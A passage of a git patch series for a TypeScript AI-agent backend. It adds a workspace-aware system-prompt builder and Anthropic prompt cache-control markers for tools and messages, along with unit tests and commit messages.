DEFAULT_WORKING_DIRECTORY (preserves today's behavior; tools surface real errors later when they reconnect). - `runAgentStep`: build the system prompt via `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})` instead of using the static `agentCustomInstructions` directly. Scope reduced from the original "A.7+9" bundle: dropped contextLimit plumbing because it's a client-side display concern in open-agents, not server-side model routing (verified via grep — open-agents' server never reads context.contextLimit either). Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring); full suite 3121/3121 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * chore(chat-workflow): drop currentBranch handling from system prompt Per direction: branch is always `main` (the default branch) in api's deployment topology, so the per-branch `Current branch: ` line and cloud-sandbox checkpointing block don't add information today. Strip the templating to keep the system prompt focused on what's load-bearing (the Environment section indicating workspace-relative paths). - Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real per-session branch) - Drop `currentBranch` from `buildAgentSystemPrompt` options + rendering - Stop reading `sandbox.currentBranch` in handleChatWorkflowStream (the field stays on AgentContext.sandbox for type completeness; also consumed by createSandboxHandler unchanged) - Remove branch-related test cases Can be re-added later if/when meaningful per-session branches (e.g. xx/abcdef12 generated branches) land. Tests: 3119/3119 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call Build failure on bf1e2451 — runAgentStep was still passing `currentBranch: input.agentContext.sandbox.currentBranch` after buildAgentSystemPrompt's option was removed. Stripping it. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- .../workflows/__tests__/runAgentStep.test.ts | 22 ++++++++ app/lib/workflows/runAgentStep.ts | 12 ++++- .../__tests__/buildAgentSystemPrompt.test.ts | 32 +++++++++++ lib/chat/buildAgentSystemPrompt.ts | 53 +++++++++++++++++++ lib/chat/handleChatWorkflowStream.ts | 22 ++++---- 5 files changed, 131 insertions(+), 10 deletions(-) create mode 100644 lib/chat/__tests__/buildAgentSystemPrompt.test.ts create mode 100644 lib/chat/buildAgentSystemPrompt.ts diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts index 429a37505..0d48f81f8 100644 --- a/app/lib/workflows/__tests__/runAgentStep.test.ts +++ b/app/lib/workflows/__tests__/runAgentStep.test.ts @@ -88,6 +88,28 @@ describe("runAgentStep", () => { expect(meta?.modelId).toBe("anthropic/claude-haiku-4.5"); }); + it("includes cwd from agentContext.sandbox in the system prompt", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ + ...baseInput, + agentContext: { + sandbox: { + state: { type: "vercel" }, + workingDirectory: "/sandbox/mono", + }, + }, + writable: stream, + } as never); + + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { system?: string }; + expect(args.system).toMatch(/# Environment/); + expect(args.system).toMatch(/Working directory: \. \(workspace root\)/); + expect(args.system).toMatch(/workspace-relative paths/); + }); + it("the wired callback returns undefined for non-finish-step parts", async () => { const captured: unknown[] = []; vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 983bf4d7a..9d752e1a7 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -1,6 +1,7 @@ import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; import { gateway } from "@ai-sdk/gateway"; import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; +import { buildAgentSystemPrompt } from "@/lib/chat/buildAgentSystemPrompt"; import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext"; @@ -57,9 +58,18 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe ...input.agentContext, model: callModel, }; + // Build the system prompt with the sandbox's real cwd baked in + // (rather than a static `agentCustomInstructions` string). Without + // this the agent has to `pwd` on every turn because its prompt + // doesn't tell it where it is. Mirrors open-agents' + // `buildSystemPrompt`. + const systemPrompt = buildAgentSystemPrompt({ + cwd: input.agentContext.sandbox.workingDirectory, + customInstructions: agentCustomInstructions, + }); const result = streamText({ model: callModel, - system: agentCustomInstructions, + system: systemPrompt, messages: modelMessages, tools, stopWhen: CHAT_AGENT_STOP_WHEN, diff --git a/lib/chat/__tests__/buildAgentSystemPrompt.test.ts b/lib/chat/__tests__/buildAgentSystemPrompt.test.ts new file mode 100644 index 000000000..81cb9268d --- /dev/null +++ b/lib/chat/__tests__/buildAgentSystemPrompt.test.ts @@ -0,0 +1,32 @@ +import { describe, it, expect } from "vitest"; +import { buildAgentSystemPrompt } from "@/lib/chat/buildAgentSystemPrompt"; + +describe("buildAgentSystemPrompt", () => { + it("emits only customInstructions when no cwd is provided", () => { + const prompt = buildAgentSystemPrompt({ customInstructions: "hello" }); + expect(prompt).toBe("hello"); + expect(prompt).not.toMatch(/Working directory/); + }); + + it("includes an Environment section when cwd is provided", () => { + const prompt = buildAgentSystemPrompt({ cwd: "/vercel/sandbox" }); + expect(prompt).toMatch(/# Environment/); + expect(prompt).toMatch(/Working directory: \. \(workspace root\)/); + expect(prompt).toMatch(/workspace-relative paths/); + }); + + it("appends customInstructions AFTER the environment section", () => { + const prompt = buildAgentSystemPrompt({ + cwd: "/sandbox", + customInstructions: "MARK_AT_END", + }); + const envIdx = prompt.indexOf("# Environment"); + const customIdx = prompt.indexOf("MARK_AT_END"); + expect(envIdx).toBeGreaterThanOrEqual(0); + expect(customIdx).toBeGreaterThan(envIdx); + }); + + it("returns empty string when all options are empty", () => { + expect(buildAgentSystemPrompt({})).toBe(""); + }); +}); diff --git a/lib/chat/buildAgentSystemPrompt.ts b/lib/chat/buildAgentSystemPrompt.ts new file mode 100644 index 000000000..922273ae7 --- /dev/null +++ b/lib/chat/buildAgentSystemPrompt.ts @@ -0,0 +1,53 @@ +const ENVIRONMENT_SECTION = `# Environment + +Working directory: . (workspace root) +Use workspace-relative paths for all file operations.`; + +export type BuildAgentSystemPromptOptions = { + /** + * Sandbox working directory. Triggers inclusion of the Environment + * section. The literal value isn't exposed to the model — the + * section just signals "you're in a workspace; use relative paths" + * (mirrors open-agents). + */ + cwd?: string; + /** + * Project-specific custom instructions appended at the end of the + * prompt (api's existing `agentCustomInstructions` — assistant file + * link prompt + recoup-api skill prompt). + */ + customInstructions?: string; +}; + +/** + * Assemble the system prompt for `runAgentStep`. Mirrors open-agents' + * `buildSystemPrompt` (`packages/agent/system-prompt.ts`) at the + * structural level — environment section → custom instructions — so + * the agent knows it's in a sandboxed workspace without having to + * run `pwd` on every prompt. + * + * Sections render only when their inputs are provided, so a request + * without sandbox context (or before sandbox boot) still produces a + * coherent (env-less) prompt. + * + * `currentBranch` handling deliberately omitted in this slim port — + * the cloud-sandbox checkpointing block in open-agents templates a + * `git push -u origin {branch}` example per session, but in api's + * deployment topology the branch is always the org repo's default + * (`main`), so the per-branch templating doesn't add value yet. Add + * back when a meaningful per-session branch lands (e.g. xx/abcdef12 + * generated branches). + */ +export function buildAgentSystemPrompt(options: BuildAgentSystemPromptOptions): string { + const parts: string[] = []; + + if (options.cwd) { + parts.push(ENVIRONMENT_SECTION); + } + + if (options.customInstructions) { + parts.push(options.customInstructions); + } + + return parts.join("\n\n"); +} diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts index 818c70f8c..5a1c89603 100644 --- a/lib/chat/handleChatWorkflowStream.ts +++ b/lib/chat/handleChatWorkflowStream.ts @@ -94,18 +94,25 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise> = []; + let workingDirectory: string = DEFAULT_WORKING_DIRECTORY; try { const sandbox = await connectVercel(session.sandbox_state as VercelState); + workingDirectory = sandbox.workingDirectory; const dirs = await getSandboxSkillDirectories(sandbox); skills = await discoverSkills(sandbox, dirs); } catch (error) { console.error( - "[handleChatWorkflowStream] skill discovery failed; continuing with empty catalog:", + "[handleChatWorkflowStream] sandbox connect / skill discovery failed; continuing with defaults:", error, ); } @@ -119,10 +126,7 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise Date: Thu, 21 May 2026 21:46:37 -0500 Subject: [PATCH 10/10] feat(chat-workflow): Anthropic prompt cache control (Bundle A.6) (#599) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Fourth open-agents → api cutover bundle. runAgentStep was sending the same system prompt + tool definitions on every turn as fresh input, even though Anthropic prompt caching can shave 90% off subsequent input cost. Production traces showed `cacheReadTokens: 0` on every api turn, while open-agents shows cacheRead matching cacheWrite from the prior turn — i.e. open-agents reuses the cached prefix. Changes (SRP — one function per file): - `lib/agent/contextManagement/isAnthropicModel.ts` — predicate port of open-agents' `packages/agent/context-management/cache-control.ts:5`. - `lib/agent/contextManagement/addCacheControlToTools.ts` — marks the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only conserves Anthropic's 4-breakpoint limit. - `lib/agent/contextManagement/addCacheControlToMessages.ts` — marks the LAST message with `cacheControl` on every step, per Anthropic's "mark the final block of the final message" guidance. `runAgentStep` now: - Wraps the tool set via `addCacheControlToTools(...)` before passing to streamText (static — set once per step). - Adds a `prepareStep` callback that wraps `messages` via `addCacheControlToMessages(...)` on every internal model call. Production behavior reproducer (Haiku 4.5, identical 2-turn prompt to both backends): api prod (broken): turn1 cacheWrite=0 cacheRead=0 cost=$0.005952 turn2 cacheWrite=0 cacheRead=0 cost=$0.005959 → flat cost; full input billed every turn. open-agents prod: turn1 cacheWrite=10966 cacheRead=0 turn2 cacheWrite=12 cacheRead=10966 cost drops 12x → near-full prefix re-read from cache on turn 2. After this PR, api should match open-agents' caching curve. Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5 addCacheControlToMessages + 2 runAgentStep wiring assertions); full suite 3138/3138 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) --- .../workflows/__tests__/runAgentStep.test.ts | 53 ++++++++++++++++ app/lib/workflows/runAgentStep.ts | 17 ++++- .../addCacheControlToMessages.test.ts | 60 ++++++++++++++++++ .../__tests__/addCacheControlToTools.test.ts | 63 +++++++++++++++++++ .../__tests__/isAnthropicModel.test.ts | 36 +++++++++++ .../addCacheControlToMessages.ts | 44 +++++++++++++ .../addCacheControlToTools.ts | 50 +++++++++++++++ .../contextManagement/isAnthropicModel.ts | 26 ++++++++ 8 files changed, 348 insertions(+), 1 deletion(-) create mode 100644 lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts create mode 100644 lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts create mode 100644 lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts create mode 100644 lib/agent/contextManagement/addCacheControlToMessages.ts create mode 100644 lib/agent/contextManagement/addCacheControlToTools.ts create mode 100644 lib/agent/contextManagement/isAnthropicModel.ts diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts index 0d48f81f8..b2e90475b 100644 --- a/app/lib/workflows/__tests__/runAgentStep.test.ts +++ b/app/lib/workflows/__tests__/runAgentStep.test.ts @@ -110,6 +110,59 @@ describe("runAgentStep", () => { expect(args.system).toMatch(/workspace-relative paths/); }); + it("wraps tools with anthropic cacheControl on the last tool before passing to streamText", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ ...baseInput, writable: stream } as never); + + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { + tools: Record< + string, + { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } } + >; + }; + const toolNames = Object.keys(args.tools); + expect(toolNames.length).toBeGreaterThan(0); + const lastTool = args.tools[toolNames[toolNames.length - 1]!]!; + expect(lastTool.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" }); + // Earlier tools should NOT carry the cache-control marker (Anthropic 4-breakpoint limit). + if (toolNames.length > 1) { + expect(args.tools[toolNames[0]!]?.providerOptions).toBeUndefined(); + } + }); + + it("wires a prepareStep callback that marks the last message with cacheControl", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ ...baseInput, writable: stream } as never); + + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { + prepareStep?: (opts: { + messages: Array<{ role: string; providerOptions?: Record }>; + model: unknown; + steps?: unknown[]; + }) => { messages?: unknown[] } | undefined; + }; + expect(typeof args.prepareStep).toBe("function"); + const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never; + const result = args.prepareStep!({ + messages: [ + { role: "user", content: "first" } as never, + { role: "user", content: "second" } as never, + ], + model: anthropicModel, + steps: [], + }); + const out = result?.messages as Array<{ providerOptions?: Record }>; + expect(out).toBeDefined(); + expect(out[0]?.providerOptions).toBeUndefined(); + expect(out[1]?.providerOptions).toEqual({ anthropic: { cacheControl: { type: "ephemeral" } } }); + }); + it("the wired callback returns undefined for non-finish-step parts", async () => { const captured: unknown[] = []; vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 9d752e1a7..7ed847d5d 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -6,6 +6,8 @@ import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext"; import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback"; +import { addCacheControlToTools } from "@/lib/agent/contextManagement/addCacheControlToTools"; +import { addCacheControlToMessages } from "@/lib/agent/contextManagement/addCacheControlToMessages"; export type RunAgentStepInput = { messages: UIMessage[]; @@ -48,7 +50,14 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe }); const modelMessages = await convertToModelMessages(input.messages); - const tools = buildAgentTools({ skills: input.agentContext.skills }); + // Mark the last tool with `cacheControl: { type: "ephemeral" }` so + // Anthropic caches the tool-definitions block across the + // conversation. Per-step message caching is wired via `prepareStep` + // below. Mirrors open-agents' `prepareCall` + `prepareStep` split. + const tools = addCacheControlToTools({ + tools: buildAgentTools({ skills: input.agentContext.skills }), + model: input.modelId, + }); // Construct the model here (not in the workflow input) — LanguageModel // instances aren't JSON-serializable and can't ride durable inputs. // Then attach to AgentContext so tools see the same model the parent @@ -74,6 +83,12 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe tools, stopWhen: CHAT_AGENT_STOP_WHEN, experimental_context: agentContext, + // Mark the LAST message with cacheControl on every step so Anthropic + // incrementally caches the conversation prefix. Mirrors open-agents' + // `prepareStep` in `open-harness-agent.ts:100`. + prepareStep: ({ messages, model }) => ({ + messages: addCacheControlToMessages({ messages, model }), + }), }); // Acquire the writer once and release in `finally` so a thrown chunk diff --git a/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts b/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts new file mode 100644 index 000000000..19b618dca --- /dev/null +++ b/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts @@ -0,0 +1,60 @@ +import { describe, it, expect } from "vitest"; +import { addCacheControlToMessages } from "@/lib/agent/contextManagement/addCacheControlToMessages"; + +const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never; +const openaiModel = { provider: "openai", modelId: "gpt-5" } as never; + +const makeMsgs = () => [ + { role: "user", content: "first" }, + { role: "assistant", content: "ack" }, + { role: "user", content: "second" }, +]; + +describe("addCacheControlToMessages", () => { + it("returns messages unchanged for non-Anthropic models", () => { + const messages = makeMsgs(); + const result = addCacheControlToMessages({ messages: messages as never, model: openaiModel }); + expect(result).toEqual(messages); + }); + + it("returns messages unchanged when the array is empty", () => { + const result = addCacheControlToMessages({ messages: [], model: anthropicModel }); + expect(result).toEqual([]); + }); + + it("marks ONLY the last message with ephemeral cacheControl (per Anthropic guidance)", () => { + const messages = makeMsgs(); + const result = addCacheControlToMessages({ + messages: messages as never, + model: anthropicModel, + }) as Array<{ providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }>; + expect(result[0]?.providerOptions).toBeUndefined(); + expect(result[1]?.providerOptions).toBeUndefined(); + expect(result[2]?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" }); + }); + + it("preserves existing providerOptions on the last message when merging the anthropic marker", () => { + const messages = [ + { role: "user", content: "first" }, + { + role: "user", + content: "second", + providerOptions: { openai: { foo: "bar" } }, + }, + ]; + const result = addCacheControlToMessages({ + messages: messages as never, + model: anthropicModel, + }) as Array<{ providerOptions?: Record }>; + expect(result[1]?.providerOptions?.openai).toEqual({ foo: "bar" }); + expect(result[1]?.providerOptions?.anthropic).toEqual({ + cacheControl: { type: "ephemeral" }, + }); + }); + + it("does NOT mutate the input messages array", () => { + const messages = makeMsgs(); + addCacheControlToMessages({ messages: messages as never, model: anthropicModel }); + expect((messages[2] as { providerOptions?: unknown }).providerOptions).toBeUndefined(); + }); +}); diff --git a/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts b/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts new file mode 100644 index 000000000..af05104f2 --- /dev/null +++ b/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts @@ -0,0 +1,63 @@ +import { describe, it, expect } from "vitest"; +import { addCacheControlToTools } from "@/lib/agent/contextManagement/addCacheControlToTools"; + +const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never; +const openaiModel = { provider: "openai", modelId: "gpt-5" } as never; + +const makeTools = () => ({ + bash: { description: "run bash", inputSchema: {} }, + read: { description: "read file", inputSchema: {} }, + write: { description: "write file", inputSchema: {} }, +}); + +describe("addCacheControlToTools", () => { + it("returns tools unchanged for non-Anthropic models", () => { + const tools = makeTools(); + const result = addCacheControlToTools({ tools, model: openaiModel }); + expect(result).toEqual(tools); + }); + + it("returns tools unchanged when the toolset is empty", () => { + const tools = {}; + const result = addCacheControlToTools({ tools, model: anthropicModel }); + expect(result).toEqual({}); + }); + + it("marks ONLY the last tool with ephemeral cacheControl (Anthropic's 4-breakpoint limit)", () => { + const tools = makeTools(); + const result = addCacheControlToTools({ tools, model: anthropicModel }) as Record< + string, + { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } } + >; + expect(result.bash?.providerOptions).toBeUndefined(); + expect(result.read?.providerOptions).toBeUndefined(); + expect(result.write?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" }); + }); + + it("preserves existing providerOptions on the last tool when merging the anthropic marker", () => { + const tools = { + a: { description: "a", inputSchema: {} }, + b: { + description: "b", + inputSchema: {}, + providerOptions: { openai: { foo: "bar" } }, + }, + } as never; + const result = addCacheControlToTools({ tools, model: anthropicModel }) as Record< + string, + { providerOptions?: Record } + >; + expect(result.b?.providerOptions?.openai).toEqual({ foo: "bar" }); + expect(result.b?.providerOptions?.anthropic).toEqual({ cacheControl: { type: "ephemeral" } }); + }); + + it("respects a custom providerOptions override", () => { + const tools = { only: { description: "x", inputSchema: {} } } as never; + const result = addCacheControlToTools({ + tools, + model: anthropicModel, + providerOptions: { anthropic: { cacheControl: { type: "ephemeral_1h" } } }, + }) as Record; + expect(result.only?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral_1h" }); + }); +}); diff --git a/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts b/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts new file mode 100644 index 000000000..ffc12fb4f --- /dev/null +++ b/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts @@ -0,0 +1,36 @@ +import { describe, it, expect } from "vitest"; +import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel"; + +describe("isAnthropicModel", () => { + it("returns true for a string model id containing 'anthropic'", () => { + expect(isAnthropicModel("anthropic/claude-haiku-4.5" as never)).toBe(true); + }); + + it("returns true for a string model id containing 'claude' (no provider prefix)", () => { + expect(isAnthropicModel("claude-3-5-haiku" as never)).toBe(true); + }); + + it("returns false for non-Anthropic string model ids", () => { + expect(isAnthropicModel("openai/gpt-5.2" as never)).toBe(false); + expect(isAnthropicModel("google/gemini-3" as never)).toBe(false); + }); + + it("returns true for a model object whose `provider` is 'anthropic'", () => { + expect(isAnthropicModel({ provider: "anthropic", modelId: "claude-haiku-4.5" } as never)).toBe( + true, + ); + }); + + it("returns true for a model object whose `provider` contains 'anthropic' (gateway-prefixed)", () => { + expect(isAnthropicModel({ provider: "gateway.anthropic", modelId: "x" } as never)).toBe(true); + }); + + it("returns true for a model object whose `modelId` contains 'anthropic' or 'claude'", () => { + expect(isAnthropicModel({ provider: "gateway", modelId: "anthropic/x" } as never)).toBe(true); + expect(isAnthropicModel({ provider: "gateway", modelId: "claude-x" } as never)).toBe(true); + }); + + it("returns false for a model object with no anthropic / claude markers", () => { + expect(isAnthropicModel({ provider: "openai", modelId: "gpt-5" } as never)).toBe(false); + }); +}); diff --git a/lib/agent/contextManagement/addCacheControlToMessages.ts b/lib/agent/contextManagement/addCacheControlToMessages.ts new file mode 100644 index 000000000..7051998f2 --- /dev/null +++ b/lib/agent/contextManagement/addCacheControlToMessages.ts @@ -0,0 +1,44 @@ +import type { JSONValue, LanguageModel, ModelMessage } from "ai"; +import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel"; + +type ProviderOptions = Record>; + +const DEFAULT_PROVIDER_OPTIONS: ProviderOptions = { + anthropic: { cacheControl: { type: "ephemeral" } }, +}; + +/** + * Mark the LAST message with `cacheControl: { type: "ephemeral" }` so + * Anthropic incrementally caches the conversation prefix. Per + * Anthropic's docs: "Mark the final block of the final message with + * cache_control so the conversation can be incrementally cached." + * + * Port of open-agents' `addCacheControl({messages, model})` overload + * in `packages/agent/context-management/cache-control.ts`. + * + * For non-Anthropic models the input is returned unchanged. The input + * array is not mutated — a new array of message refs is returned. + */ +export function addCacheControlToMessages(opts: { + messages: ModelMessage[]; + model: LanguageModel; + providerOptions?: ProviderOptions; +}): ModelMessage[] { + const { messages, model, providerOptions = DEFAULT_PROVIDER_OPTIONS } = opts; + + if (!isAnthropicModel(model)) return messages; + if (messages.length === 0) return messages; + + const lastIndex = messages.length - 1; + return messages.map((message, index) => + index === lastIndex + ? { + ...message, + providerOptions: { + ...(message as { providerOptions?: ProviderOptions }).providerOptions, + ...providerOptions, + }, + } + : message, + ); +} diff --git a/lib/agent/contextManagement/addCacheControlToTools.ts b/lib/agent/contextManagement/addCacheControlToTools.ts new file mode 100644 index 000000000..2b63cab18 --- /dev/null +++ b/lib/agent/contextManagement/addCacheControlToTools.ts @@ -0,0 +1,50 @@ +import type { JSONValue, LanguageModel, ToolSet } from "ai"; +import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel"; + +type ProviderOptions = Record>; + +const DEFAULT_PROVIDER_OPTIONS: ProviderOptions = { + anthropic: { cacheControl: { type: "ephemeral" } }, +}; + +/** + * Mark the LAST tool in a toolset with `cacheControl: { type: "ephemeral" }` + * so Anthropic caches the tool-definitions block across the conversation. + * + * Port of open-agents' `addCacheControl({tools, model})` overload in + * `packages/agent/context-management/cache-control.ts`. Why only the + * last tool: Anthropic enforces a max of 4 cache breakpoints, and we + * spend one each on the system prompt + messages, so we conserve by + * marking just the trailing tool entry (the message's cumulative + * cache covers the rest). + * + * For non-Anthropic models the input is returned unchanged. + */ +export function addCacheControlToTools(opts: { + tools: T; + model: LanguageModel; + providerOptions?: ProviderOptions; +}): T { + const { tools, model, providerOptions = DEFAULT_PROVIDER_OPTIONS } = opts; + + if (!isAnthropicModel(model)) return tools; + + const entries = Object.entries(tools); + if (entries.length === 0) return tools; + + const lastIndex = entries.length - 1; + return Object.fromEntries( + entries.map(([name, t], index) => [ + name, + index === lastIndex + ? { + ...t, + providerOptions: { + ...(t as { providerOptions?: ProviderOptions }).providerOptions, + ...providerOptions, + }, + } + : t, + ]), + ) as T; +} diff --git a/lib/agent/contextManagement/isAnthropicModel.ts b/lib/agent/contextManagement/isAnthropicModel.ts new file mode 100644 index 000000000..b2442785b --- /dev/null +++ b/lib/agent/contextManagement/isAnthropicModel.ts @@ -0,0 +1,26 @@ +import type { LanguageModel } from "ai"; + +/** + * Predicate: is this a Claude / Anthropic model? Drives whether to + * attach `cacheControl: { type: "ephemeral" }` to messages + tools + * (Anthropic prompt caching) or leave them untouched. + * + * Byte-for-byte port of open-agents' `isAnthropicModel` + * (`packages/agent/context-management/cache-control.ts`). + * + * Accepts both string model ids (e.g. `"anthropic/claude-haiku-4.5"`) + * and `LanguageModel` instances (e.g. the value returned from + * `gateway("anthropic/claude-...")`, which carries `provider` and + * `modelId` properties). + */ +export function isAnthropicModel(model: LanguageModel): boolean { + if (typeof model === "string") { + return model.includes("anthropic") || model.includes("claude"); + } + return ( + model.provider === "anthropic" || + model.provider.includes("anthropic") || + model.modelId.includes("anthropic") || + model.modelId.includes("claude") + ); +}